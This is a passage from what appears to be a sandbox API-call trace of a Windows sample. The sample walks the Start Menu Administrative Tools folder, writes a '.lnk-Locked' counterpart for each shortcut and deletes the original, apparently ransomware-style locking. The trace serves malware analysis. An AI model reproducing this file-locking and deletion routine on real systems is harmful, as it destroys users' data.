lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505b5aa3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x505b5aa3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x505b5aa3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Disk Cleanup.lnk", cAlternateFileName="")) returned 1 [0300.009] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12bb3f15, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12bb3f15, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12bb3f15, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x490, dwReserved0=0x0, dwReserved1=0x0, cFileName="Event Viewer.lnk", cAlternateFileName="")) returned 1 [0300.009] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16643a7b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16643a7b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16643a7b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x478, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI Initiator.lnk", cAlternateFileName="")) returned 1 [0300.009] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1375365d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1375365d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1375365d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x474, dwReserved0=0x0, dwReserved1=0x0, cFileName="Memory Diagnostics Tool.lnk", cAlternateFileName="")) returned 1 [0300.009] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bb0d81e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2bb0d81e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2bb0d81e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ODBC Data Sources (32-bit).lnk", cAlternateFileName="")) returned 1 [0300.009] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1931ddb6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1931ddb6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1931ddb6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ODBC Data Sources (64-bit).lnk", cAlternateFileName="")) returned 1 [0300.010] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1425a437, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1425a437, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1425a437, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0x0, dwReserved1=0x0, cFileName="Performance Monitor.lnk", cAlternateFileName="")) returned 1 [0300.010] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37cc46a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37cc46a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37cc46a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Print Management.lnk", cAlternateFileName="")) returned 1 [0300.010] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1425a437, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1425a437, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1425a437, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x454, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resource Monitor.lnk", cAlternateFileName="")) returned 1 [0300.010] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36c3a1d0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36c3a1d0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36c3a1d0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security Configuration Management.lnk", cAlternateFileName="")) returned 1 [0300.011] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12d0b438, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12d0b438, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12d0b438, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x486, dwReserved0=0x0, dwReserved1=0x0, cFileName="services.lnk", cAlternateFileName="")) returned 1 [0300.011] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x142341dc, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x142341dc, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x142341dc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Configuration.lnk", cAlternateFileName="")) returned 1 [0300.011] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14fe9a0b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14fe9a0b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14fe9a0b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Information.lnk", cAlternateFileName="")) returned 1 [0300.012] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12bb3f15, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12bb3f15, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12bb3f15, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x46c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task Scheduler.lnk", cAlternateFileName="")) returned 1 [0300.012] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b137854, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1b137854, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1b137854, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x484, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Firewall with Advanced Security.lnk", cAlternateFileName="")) returned 1 [0300.012] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b137854, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1b137854, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1b137854, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x484, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Firewall with Advanced Security.lnk", cAlternateFileName="")) returned 0 [0300.012] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.013] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk-Locked", lpFilePart=0x0) returned 0x67 [0300.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.013] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\component services.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.014] GetFileType (hFile=0x49c) returned 0x1 [0300.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.014] GetFileType (hFile=0x49c) returned 0x1 [0300.016] CloseHandle (hObject=0x49c) returned 1 [0300.017] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk", lpFilePart=0x0) returned 0x60 [0300.017] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\component services.lnk")) returned 1 [0300.017] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk-Locked", lpFilePart=0x0) returned 0x68 [0300.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.018] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\computer management.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.018] GetFileType (hFile=0x49c) returned 0x1 [0300.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.018] GetFileType (hFile=0x49c) returned 0x1 [0300.019] CloseHandle (hObject=0x49c) returned 1 [0300.020] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk", lpFilePart=0x0) returned 0x61 [0300.020] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\computer management.lnk")) returned 1 [0300.020] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini-Locked", lpFilePart=0x0) returned 0x5c [0300.020] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.020] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.021] GetFileType (hFile=0x49c) returned 0x1 [0300.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.021] GetFileType (hFile=0x49c) returned 0x1 [0300.022] CloseHandle (hObject=0x49c) returned 1 [0300.022] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini", lpFilePart=0x0) returned 0x55 [0300.023] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini")) returned 1 [0300.023] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\dfrgui.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\dfrgui.lnk-Locked", lpFilePart=0x0) returned 0x5b [0300.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.023] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\dfrgui.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\dfrgui.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.023] GetFileType (hFile=0x49c) returned 0x1 [0300.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.024] GetFileType (hFile=0x49c) returned 0x1 [0300.025] CloseHandle (hObject=0x49c) returned 1 [0300.026] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\dfrgui.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\dfrgui.lnk", lpFilePart=0x0) returned 0x54 [0300.026] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\dfrgui.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\dfrgui.lnk")) returned 1 [0300.027] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Disk Cleanup.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Disk Cleanup.lnk-Locked", lpFilePart=0x0) returned 0x61 [0300.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.028] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Disk Cleanup.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\disk cleanup.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.028] GetFileType (hFile=0x49c) returned 0x1 [0300.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.028] GetFileType (hFile=0x49c) returned 0x1 [0300.030] CloseHandle (hObject=0x49c) returned 1 [0300.030] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Disk Cleanup.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Disk Cleanup.lnk", lpFilePart=0x0) returned 0x5a [0300.030] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Disk Cleanup.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\disk cleanup.lnk")) returned 1 [0300.032] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk-Locked", lpFilePart=0x0) returned 0x61 [0300.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.032] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\event viewer.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.033] GetFileType (hFile=0x49c) returned 0x1 [0300.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.033] GetFileType (hFile=0x49c) returned 0x1 [0300.036] CloseHandle (hObject=0x49c) returned 1 [0300.036] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk", lpFilePart=0x0) returned 0x5a [0300.036] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\event viewer.lnk")) returned 1 [0300.038] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk-Locked", lpFilePart=0x0) returned 0x64 [0300.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.038] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\iscsi initiator.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.040] GetFileType (hFile=0x49c) returned 0x1 [0300.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.040] GetFileType (hFile=0x49c) returned 0x1 [0300.043] CloseHandle (hObject=0x49c) returned 1 [0300.043] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk", lpFilePart=0x0) returned 0x5d [0300.043] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\iscsi initiator.lnk")) returned 1 [0300.047] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk-Locked", lpFilePart=0x0) returned 0x6c [0300.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.047] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.052] GetFileType (hFile=0x49c) returned 0x1 [0300.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.052] GetFileType (hFile=0x49c) returned 0x1 [0300.054] CloseHandle (hObject=0x49c) returned 1 [0300.055] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk", lpFilePart=0x0) returned 0x65 [0300.055] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk")) returned 1 [0300.060] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\ODBC Data Sources (32-bit).lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\ODBC Data Sources (32-bit).lnk-Locked", lpFilePart=0x0) returned 0x6f [0300.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.060] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\ODBC Data Sources (32-bit).lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\odbc data sources (32-bit).lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.060] GetFileType (hFile=0x49c) returned 0x1 [0300.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.060] GetFileType (hFile=0x49c) returned 0x1 [0300.062] CloseHandle (hObject=0x49c) returned 1 [0300.062] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\ODBC Data Sources (32-bit).lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\ODBC Data Sources (32-bit).lnk", lpFilePart=0x0) returned 0x68 [0300.062] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\ODBC Data Sources (32-bit).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\odbc data sources (32-bit).lnk")) returned 1 [0300.063] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\ODBC Data Sources (64-bit).lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\ODBC Data Sources (64-bit).lnk-Locked", lpFilePart=0x0) returned 0x6f [0300.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.063] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\ODBC Data Sources (64-bit).lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\odbc data sources (64-bit).lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.064] GetFileType (hFile=0x49c) returned 0x1 [0300.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.064] GetFileType (hFile=0x49c) returned 0x1 [0300.065] CloseHandle (hObject=0x49c) returned 1 [0300.066] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\ODBC Data Sources (64-bit).lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\ODBC Data Sources (64-bit).lnk", lpFilePart=0x0) returned 0x68 [0300.066] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\ODBC Data Sources (64-bit).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\odbc data sources (64-bit).lnk")) returned 1 [0300.066] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk-Locked", lpFilePart=0x0) returned 0x68 [0300.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 